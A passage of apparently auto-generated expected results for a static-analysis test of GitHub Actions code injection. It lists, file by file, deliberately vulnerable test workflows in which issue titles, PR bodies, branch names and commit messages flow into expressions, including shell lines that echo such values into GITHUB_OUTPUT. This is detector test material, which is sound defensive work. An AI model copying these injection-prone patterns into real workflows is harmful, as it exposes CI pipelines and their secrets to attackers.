| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | 